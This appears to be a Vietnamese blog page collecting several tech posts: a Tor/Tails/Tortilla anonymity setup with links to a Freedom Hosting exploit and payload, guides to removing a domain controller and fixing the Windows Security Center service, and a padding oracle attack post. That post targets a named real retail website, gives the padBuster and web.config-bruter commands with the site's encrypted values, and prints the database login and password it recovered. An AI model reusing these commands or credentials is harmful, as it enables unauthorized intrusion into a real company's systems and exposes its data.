Tails + Vmware + Tortilla = "Siêu Hành"

Trước khi bắt đầu bài mới này, chúng ta sẽ nhớ sự kiện gần đây đã xảy ra xung quanh trên sự riêng tư của người sử dụng mạng.

Như chúng ta đều biết các thiết kế của mạng Tor đảm bảo rằng người dùng không thể biết được nơi có vị trí máy chủ và máy chủ không thể biết địa chỉ IP của người dùng, tất nhiên trừ khi bạn chèn mã theo dõi.

Hãy nhớ lại vụ của Freedom hosting, 1 vài đoạn mã script giúp FBI có thể truy ra IP thật của bạn, đó là lỗi của Tor trên Firefox 17 ESR

Exploit Zero-Day :   http://pastebin.com/GxRkkCXh

Payload                :    http://pastebin.com/AwnzEpmX

Tortilla

Tortilla là một công cụ mã nguồn mở cho phép người dùng lướt web một cách an toàn, vô danh. Tortilla có các tuyến đường chức năng TCP / IP và DNS, không phụ thuộc vào phần mềm máy khách, và không dựa trên bất kỳ VPN, thêm phần cứng hoặc một máy ảo.

Tải về: http://www.crowdstrike.com/community-tools/

Ấn vào tệp exe để cài nhé, tự động hết

Setup TESTSIGNING Cấu hình khởi động.

Đầu tiên cứ làm theo hình

Máy mình làm tại quán net, nên nó khóa CMD rồi, nên bạn cứ làm theo hình nhé.

Mở CMD, gõ sao cho nó giống hình.

Kích hoạt tính năng : Bcdedit.exe -set TESTSIGNING ON

Tắt kick hoạt          : Bcdedit.exe -set TESTSIGNING OFF

Như hình là đã xong.

Như chúng ta có thể nhìn thấy testsigning tùy chọn đã được thiết lập. Sau đó tiến hành khởi động lại. và kiểm tra tập tin config Tor, để biết chính xác là cổng 9051.

Lưu ý: nếu có cổng 9050 như mình đây,m thì thiết lâp lại nhé.

Đã cài xong cái Tortilla

Thêm một network nữa

Cài Tails trên máy ảo

tải về: https://tails.boum.org/download/index.fr.html#index2h1

Làm như hình, quá dễ dàng để làm

Thiết lập Tortilla cho máy ảo

Làm như hình

Một vài thiết lập nhỏ, giúp chúng ta có 1 hệ thống "Hành" rất đỉnh. Cảm ơn đã đón đọc

readmore...

Cách xóa DOMAIN CONTROLLER trong sever

Bước 1: Nhấn Start nhập lệnh CMD

Bước 2: Nhập lệnh DCPROMO - u

Bước 3: Xuất hiện cửa sổ Active Directory Installation Wizard. Nhấn Next

Bước 4: Nhấn Next

Bước 5: Đánh dấu vào checkbox rồi nhấn Next

Bước 6: Nhấn Next

Bước 7: Nhập mật khẩu Administrator và xác nhận mật khẩu. Nhấn Next

Bước 8: Xuất hiện của sổ configuration lại DC.

Bước 9: Xuất hiện thông báo thành công. Ta nhấn Finish

readmore...

Padding Orale Attack

Victim: http://bigc.vn/

Kiểm tra lỗi Padding Orale

View source:

Chú ý đoạn code sau:

/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 

Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

http://www.activestate.com/activeperl/downloads

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:

http://www.mediafire.com/?a0auo2tca0ffdfe

Web.config_bruter.pl:

http://www.mediafire.com/?3twc9xwizdcdw8p

pass unlock: soleil_vhb

pass giải nén: ceh.vn

Bước 2:  Thực hiện lệnh trên CMD

vào Run command

Cd\

Chạy lệnh:

padBuster.pl http://bigc.vn/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"

Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:

“The ID# marked with **  is recommended: “

Lúc này ta sẽ nhập số 2 và ấn enter

Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:

M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:

Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8

Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau: 

Kết quả: 

 u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1

 gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1

Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả

Bước 3: Lấy thông tin file config:

http://bigc.vn/ScriptResource.axd?d=gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1

hoặc:

http://bigc.vn/ScriptResource.axd?d=u2LzoCD0ZcozT5Dq9vm%20iJY9gkwLdZ1xCAAAAAAAAAAA1

Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi

Bước 4: login vào Database

Sử dụng tool: MySQL management studio express

http://www.scottsystems.com/products/maxxtraxx_ce/downloads/

readmore...

Cách khắc phục lỗi: "Security Center service can't be started"

security center service can't be started

1. Tùy vào HĐH đàng xài mà bạn làm như sau
   • Windows 8
     1. Bấm phím Windows+C.
     2. Bấm vào Search charm và click Settings.
     3. Trên hộp search gõ vào services.
     4. Click vào View local services.
     
     
   • Windows 7 and Windows Vista
     1. Click Start.
     2. Ở khung tìm kiếm, gõ services
     3. Trong danh sách hiện ra chọn Services.
   
   
2. Trong cửa sổ này click phải vào (Hoặc nhấn giữ trên Windows 8) Security Center sau đó chọn Properties.
   
   
   
3. Chọn Automatic (Delayed Start) ở mục Startup Type.
   
   
   
   
   
4. Bấm vào nút Start bên dưới khi vực Status
   
   Lưu ý
   • Nếu service khởi động thành công, click Apply, hoặc OK, sau đó đóng cửa sổ Services lại.
   • Nếu bạn nhận được thông báo sau khi click Start:"Windows could not start the Security Center service on Local Computer. Error 1079: The account specified for this service differs from the account specified for other services running in the same process." thì tiếp tục làm bước tiếp theo
   
   
5. Trên hộp thoại Security Center Properties Chọn tab "Log On" sau đó click Browse.
   
   
   
   
6. Ở ô "Enter the object name to select box", bạn gõ vào tên máy tính của bạn (Để biết tên máy là gì thì click phải vào My Computer -> Properties)
   
   
   
   
   
   
   
7. Click vào "Check Names", sau đó click vào OK khi tên này đã đc chứng thực tồn tại.
8. Quay lại hộp thoại "Security Center Properties" hồi nãy, bạn gõ mật khẩu Administrator vào. Nếu tài khoản Administrator đang bị disable thì để trống
9. Click Apply sau đó click OK.
10. Đóng cửa sổ services lại

Nếu bạn làm như trên vẫn không khắc phục đc, có thể máy bạn đã dính malware hoặc registry bị hỏng. Cần cài lại windows

Chúc các bạn thành công 

readmore...